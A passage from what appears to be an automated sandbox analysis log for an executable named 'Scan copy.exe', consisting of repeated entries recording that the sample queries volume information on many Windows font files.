                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
